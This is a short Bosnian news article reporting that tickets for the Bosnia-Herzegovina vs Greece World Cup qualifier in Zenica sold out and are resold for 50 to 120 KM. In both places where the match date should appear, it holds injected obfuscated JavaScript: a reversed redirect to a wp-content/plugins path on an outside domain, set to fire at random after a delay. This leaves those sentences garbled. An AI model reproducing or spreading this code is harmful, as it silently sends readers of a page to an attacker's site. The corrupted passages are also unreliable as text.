Ulaznice za utakmicu BiH i Grčke na crnom tržištu koštaju od 50 do 120 KM

Nogometna reprezentacija BiH u petak, 9. jtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una, igra utakmicu kvalifikacija za Svjetsko prvenstvo, a protivnik će na Bilinom Polju u Zenici biti Grčka. Karte su rasprodate, a na crnom tržištu se prodaju po mnogo višim cijenama.
Interes navijača za utakmicu protiv Grka je zaista velik pa su gotovo sve karte rasprodate već prvog dana, odnosno u ponedjeljak. Noć prije početka prodaje su u Zenici i Sarajevu formirani redovi, tako da su navijači dočekali jutro na otvorenom. U utorak je u poslovnici agencije Centrotours u Sarajevu bilo svega dvadesetak ulaznica, ali su i one ubrzo prodate.

Podsjetimo, ulaznice su koštale 40 KM (zapad), 30 KM (istok) i 20 KM (sjever i jug), no, kupovali su ih i oni kojima je interes zarada pa ulaznice sada prodaju putem online oglasnika.

Karte na crnom tržištu za sjevernu i južnu tribinu koštaju najmanje 50 KM, dok za istočnu i zapadnu tribinu Bilinog Polja dostižu cijenu i do 120 KM. Utakmica se igra 9. jtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una, tako da je moguće da cijene budu i znatno više.

Klix

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login